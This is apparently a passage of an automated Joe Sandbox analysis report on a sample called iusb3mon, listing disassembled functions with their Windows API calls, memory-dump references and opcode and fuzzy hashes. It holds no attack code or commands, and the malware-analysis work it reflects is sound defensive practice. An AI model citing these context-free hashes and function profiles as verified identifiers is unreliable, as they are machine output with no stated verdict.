                                                                                                                    • API String ID: 4010645601-3228434003
                                                                                                                    • Opcode ID: b1503772986f8e874ab057f273ec84366a88b191f7bae086b25b54faa3fa615e
                                                                                                                    • Instruction ID: e7a8b27c77915214be177003ef8b99f39644a46d7ae6730461e7478f6d3f0678
                                                                                                                    • Opcode Fuzzy Hash: b1503772986f8e874ab057f273ec84366a88b191f7bae086b25b54faa3fa615e
                                                                                                                    • Instruction Fuzzy Hash: 58E08631666311BAD6913B616C4AFCF3F6AAF49710F104445FF5974080D7B291D18B9B
                                                                                                                    Function 0624C069 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32,062499FE), ref: 0624C06E
                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0624C07E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                    • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                    • API String ID: 1646373207-3105848591
                                                                                                                    • Opcode ID: b4f667161f4ae1e475063c5d52ca67913c1fad2b2bcbbfb99fba42a3f9f2feb6
                                                                                                                    • Instruction ID: 1e9694a6c18fc33f13dcd340d447265ce7a7e78a1a145dffb0ac5ac5859b73a3
                                                                                                                    • Opcode Fuzzy Hash: b4f667161f4ae1e475063c5d52ca67913c1fad2b2bcbbfb99fba42a3f9f2feb6
                                                                                                                    • Instruction Fuzzy Hash: 6EC012A07663036AFAB43A751C4DF15210C0B00942F061254AE45D4484CAB0C200C931
                                                                                                                    Function 0624AF85 Relevance: 6.5, APIs: 5, Instructions: 278COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 80d84ea4fd771fae966261ec32ea088f8ce8d9d317b564af7483c7e8f42b99dc
                                                                                                                    • Instruction ID: 4046f3972422765c80b111c19c92365b916f9735e4ce2ada105e2ca5e3cfd447
                                                                                                                    • Opcode Fuzzy Hash: 80d84ea4fd771fae966261ec32ea088f8ce8d9d317b564af7483c7e8f42b99dc
                                                                                                                    • Instruction Fuzzy Hash: E2910871D21215AEEFA9FB68DC84A9E7BB9EB49762F140211FC25B6580E731CD40CB60
                                                                                                                    Function 0624F990 Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • HeapAlloc.KERNEL32(00000000,00002020,?,?,?,06248D56,0624FE5C,00000000,00000010,00000000,00000009,00000009,?,0624AD87,00000010,00000000), ref: 0624F9B1
                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,06248D56,0624FE5C,00000000,00000010,00000000,00000009,00000009,?,0624AD87,00000010,00000000), ref: 0624F9D5
                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,06248D56,0624FE5C,00000000,00000010,00000000,00000009,00000009,?,0624AD87,00000010,00000000), ref: 0624F9EF
                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,06248D56,0624FE5C,00000000,00000010,00000000,00000009,00000009,?,0624AD87,00000010,00000000,06248D56), ref: 0624FAB0
                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,06248D56,0624FE5C,00000000,00000010,00000000,00000009,00000009,?,0624AD87,00000010,00000000,06248D56,00000000), ref: 0624FAC7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocVirtual$FreeHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 714016831-0
                                                                                                                    • Opcode ID: a6a3cac408ab72f22ad241a376146144dabb66191d0a10de3f824323f2204755
                                                                                                                    • Instruction ID: 76bb1220372dd3d9cbf11f1a489cbc2475b22cfe20e437285c15dc11ff5086f2
                                                                                                                    • Opcode Fuzzy Hash: a6a3cac408ab72f22ad241a376146144dabb66191d0a10de3f824323f2204755
                                                                                                                    • Instruction Fuzzy Hash: 1A312471A207129FD7749F24FE88B21B7E2EBC0750F10813AFA5597284E770A445CF56
                                                                                                                    Function 062519EA Relevance: 6.2, APIs: 4, Instructions: 170fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 06251A64
                                                                                                                    • GetLastError.KERNEL32 ref: 06251A6E
                                                                                                                    • ReadFile.KERNEL32(?,?,00000001,?,00000000), ref: 06251B34
                                                                                                                    • GetLastError.KERNEL32 ref: 06251B3E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFileLastRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1948546556-0
                                                                                                                    • Opcode ID: 7ec37d35aa39921f25085444b67e011a928c9d9bc30cd5c601c8bcddfd2650ee
                                                                                                                    • Instruction ID: e678b70b1ba60d1f8389334d921195719dc31abdd073a2d56a1280cd94e14f92
                                                                                                                    • Opcode Fuzzy Hash: 7ec37d35aa39921f25085444b67e011a928c9d9bc30cd5c601c8bcddfd2650ee
                                                                                                                    • Instruction Fuzzy Hash: C1512B30A24346DFDFB19F58C888BA97BF0BF02304F168599EC618B355E3749565CB52
                                                                                                                    Function 06251626 Relevance: 6.1, APIs: 4, Instructions: 135fileCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WriteFile.KERNEL32(?,?,?,00000000,00000000,00000001,00000824,?), ref: 062516ED
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3934441357-0
                                                                                                                    • Opcode ID: 7fd364dd2f6546ce06b105111a02423605d00d6d7761a51a2dbc1d0f36916d4d
                                                                                                                    • Instruction ID: 52d256940b1807693a91ae0bf9bf8f00b4e553ef1ff2b55ee904f60a50283edd
                                                                                                                    • Opcode Fuzzy Hash: 7fd364dd2f6546ce06b105111a02423605d00d6d7761a51a2dbc1d0f36916d4d
                                                                                                                    • Instruction Fuzzy Hash: 61518D31A20209EFDBA1CF68C888BAD7BB5FF45340F168595EC259F250D7709A50CBA0
                                                                                                                    Function 06256B0E Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InterlockedIncrement.KERNEL32(0627893C), ref: 06256B52
                                                                                                                    • InterlockedDecrement.KERNEL32(0627893C), ref: 06256B61
                                                                                                                    • InterlockedDecrement.KERNEL32(0627893C), ref: 06256B94
                                                                                                                    • InterlockedDecrement.KERNEL32(0627893C), ref: 06256C2C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Interlocked$Decrement$Increment
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2574743344-0
                                                                                                                    • Opcode ID: 20277e1075370cb1c82eabb033dc5af6b0dd24764bf71d744d91add9eaf778f7
                                                                                                                    • Instruction ID: 57df7aad2c4fe724022be3904ab0a3bc1b0ebd170c55a7542dcbea05375f6435
                                                                                                                    • Opcode Fuzzy Hash: 20277e1075370cb1c82eabb033dc5af6b0dd24764bf71d744d91add9eaf778f7
                                                                                                                    • Instruction Fuzzy Hash: 2D313531A34316BFFFB26B60DC4CBAA7FA6EB02721F550059FD04662E1CA744981C790
                                                                                                                    Function 0625BF72 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0625C0EA: GetParent.USER32(?), ref: 0625C11D
                                                                                                                      • Part of subcall function 0625C0EA: GetLastActivePopup.USER32(?), ref: 0625C12C
                                                                                                                      • Part of subcall function 0625C0EA: IsWindowEnabled.USER32(?), ref: 0625C141
                                                                                                                      • Part of subcall function 0625C0EA: EnableWindow.USER32(?,00000000), ref: 0625C154
                                                                                                                    • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 0625BFA8
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 0625C016
                                                                                                                    • MessageBoxA.USER32(00000000,?,?,00000000), ref: 0625C024
                                                                                                                    • EnableWindow.USER32(00000000,00000001), ref: 0625C040
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$EnableMessage$ActiveEnabledFileLastModuleNameParentPopupSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1958756768-0
                                                                                                                    • Opcode ID: d095f0818905441068fde4b026159afee5b7e99ac38c69fd27b76d55c86eeace
                                                                                                                    • Instruction ID: 06c154a57a0782abe69649b0c926acc6bcc7ac59add9d80de5120f19ce3c1e0b
                                                                                                                    • Opcode Fuzzy Hash: d095f0818905441068fde4b026159afee5b7e99ac38c69fd27b76d55c86eeace
                                                                                                                    • Instruction Fuzzy Hash: 7A219176E2020AAFDB708F95CCD5AEDB7B9EB04351F160429FE50E2240D7719A40CF60
                                                                                                                    Function 062533E5 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(0624EA70,00000001,00000000,?,?,?,?,?,?,0624EA70,?,0000000C), ref: 06253414
                                                                                                                    • MultiByteToWideChar.KERNEL32(0624EA70,00000009,0000000C,?,00000000,00000000,?,?,?,0624EA70,?,0000000C), ref: 06253427
                                                                                                                    • MultiByteToWideChar.KERNEL32(0624EA70,00000001,0000000C,?,?,00000000,?,?,?,0624EA70,?,0000000C), ref: 06253473
                                                                                                                    • CompareStringW.KERNEL32(?,?,?,?,?,00000000,?,00000000,?,?,?,0624EA70,?,0000000C), ref: 0625348B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$CompareString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 376665442-0
                                                                                                                    • Opcode ID: 111746dd7e6f6fd18c55a42edca8399b194aebf331b8e64007edfd8d4b2cc94f
                                                                                                                    • Instruction ID: 2e1088548aec3c9257c54f26639beb1a54232f8ea5c276ea0d1a5df05ea032b6
                                                                                                                    • Opcode Fuzzy Hash: 111746dd7e6f6fd18c55a42edca8399b194aebf331b8e64007edfd8d4b2cc94f
                                                                                                                    • Instruction Fuzzy Hash: 99210732D1025AEBCF228F84DC499DEBFB6FB49750F164126FE1562160D3329A61DB90
                                                                                                                    Function 0624827E Relevance: 6.1, APIs: 4, Instructions: 51memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FreeLibrary.KERNEL32(?,00000000,?,?,06247ED1,00000000,?,?,?,?,?,?,?,00000000,00000000,?), ref: 062482BA
                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,06247ED1,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 062482DE
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,06247ED1,00000000,?,?,?,?,?,?,?,00000000,00000000,?), ref: 062482E6
                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00000000,?), ref: 062482ED
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Free$Heap$LibraryProcessVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 548792435-0
                                                                                                                    • Opcode ID: 014fca4a8a184fdb8a735e1a1a320d8414789a13bf43310eab3db6aa9b5c72f2
                                                                                                                    • Instruction ID: 91232fa57b53791ed81f3f861b541d034ea5d638c65a0b0b5aac8d907ce343be
                                                                                                                    • Opcode Fuzzy Hash: 014fca4a8a184fdb8a735e1a1a320d8414789a13bf43310eab3db6aa9b5c72f2
                                                                                                                    • Instruction Fuzzy Hash: C9012172910B429FD774EFA8DCC882B77E9FB44221305892DF6A693950CB34E941CF50
                                                                                                                    Function 0625A750 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,?), ref: 0625A75B
                                                                                                                    • GetTopWindow.USER32(00000000), ref: 0625A76E
                                                                                                                    • GetTopWindow.USER32(?), ref: 0625A79E
                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0625A7B9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Item
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 369458955-0
                                                                                                                    • Opcode ID: 46dd5a572ef41ea46c229e0713871712bf5d2f228b26225c04f2e03ef48550d1
                                                                                                                    • Instruction ID: d1ceaca273aedffd4aec79d51c5ec2c18769be84e3511db0e9fb6343390ed294
                                                                                                                    • Opcode Fuzzy Hash: 46dd5a572ef41ea46c229e0713871712bf5d2f228b26225c04f2e03ef48550d1
                                                                                                                    • Instruction Fuzzy Hash: 9E018F32821716BBAFB22F619C16EAE7B79EF44A50F034221FE1099014D771CA118AE1
                                                                                                                    Function 0625A7C9 Relevance: 6.0, APIs: 4, Instructions: 49windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetTopWindow.USER32(?), ref: 0625A7D7
                                                                                                                    • SendMessageA.USER32(00000000,?,?,?), ref: 0625A80D
                                                                                                                    • GetTopWindow.USER32(00000000), ref: 0625A81A
                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0625A838
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1496643700-0
                                                                                                                    • Opcode ID: 80edc636b2e399a91e73eb0d0718ebbeaf0712bce73c5b26263023cfe7da2f6b
                                                                                                                    • Instruction ID: 250f33a221afd799a2a1ff52441b9ad16883f061bf7da6e61b5a7c83f8f58043
                                                                                                                    • Opcode Fuzzy Hash: 80edc636b2e399a91e73eb0d0718ebbeaf0712bce73c5b26263023cfe7da2f6b
                                                                                                                    • Instruction Fuzzy Hash: 1A01ED3242025AFBDFA25E91EC09EDF3A66EF45750F064111FE1055060C735C662EBA2
                                                                                                                    Function 06258C3E Relevance: 6.0, APIs: 4, Instructions: 48windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Item$EnableFocusMenuNextParent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 988757621-0
                                                                                                                    • Opcode ID: b85d7ec1f906d8fb80029259a82e7d0faf02c31e6e8f66d68d10af1338b4aa02
                                                                                                                    • Instruction ID: 74e80f9646d3942fdc9868f45e681fbbb45ac261b4fa2da935067aab9d95ac11
                                                                                                                    • Opcode Fuzzy Hash: b85d7ec1f906d8fb80029259a82e7d0faf02c31e6e8f66d68d10af1338b4aa02
                                                                                                                    • Instruction Fuzzy Hash: 42115271920711AFDB7C9F60E858F6A77B5EF40712F124A1CFA96865E0C7B4E881CB50
                                                                                                                    Function 0625AD58 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetObjectA.GDI32(00000000,0000000C,?), ref: 0625AD96
                                                                                                                    • SetBkColor.GDI32(00000000,00000000), ref: 0625ADA2
                                                                                                                    • GetSysColor.USER32(00000008), ref: 0625ADB2
                                                                                                                    • SetTextColor.GDI32(00000000,?), ref: 0625ADBC
                                                                                                                      • Part of subcall function 0625B81C: GetWindowLongA.USER32(00000000,000000F0), ref: 0625B82D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$LongObjectTextWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2871169696-0
                                                                                                                    • Opcode ID: b1b8fd0cfcb097f5574749e5fb2a2572f9b34c65bffbf3968b27213670b4f7bc
                                                                                                                    • Instruction ID: 4e255e03f71c0d189c4e7463225f1476015fe3bd49e304aa6ba62db01a9e1868
                                                                                                                    • Opcode Fuzzy Hash: b1b8fd0cfcb097f5574749e5fb2a2572f9b34c65bffbf3968b27213670b4f7bc
                                                                                                                    • Instruction Fuzzy Hash: 0F01313192120AEBDFB16F64EC5ABAE3B65EB00352F524611FE55D50E0CB70C994CF61
                                                                                                                    Function 062565EF Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InterlockedExchange.KERNEL32(062788B8,00000001), ref: 06256617
                                                                                                                    • InitializeCriticalSection.KERNEL32(062788A0,?,?,?,0625495C), ref: 06256622
                                                                                                                    • EnterCriticalSection.KERNEL32(062788A0,?,?,?,0625495C), ref: 06256661
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$EnterExchangeInitializeInterlocked
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3643093385-0
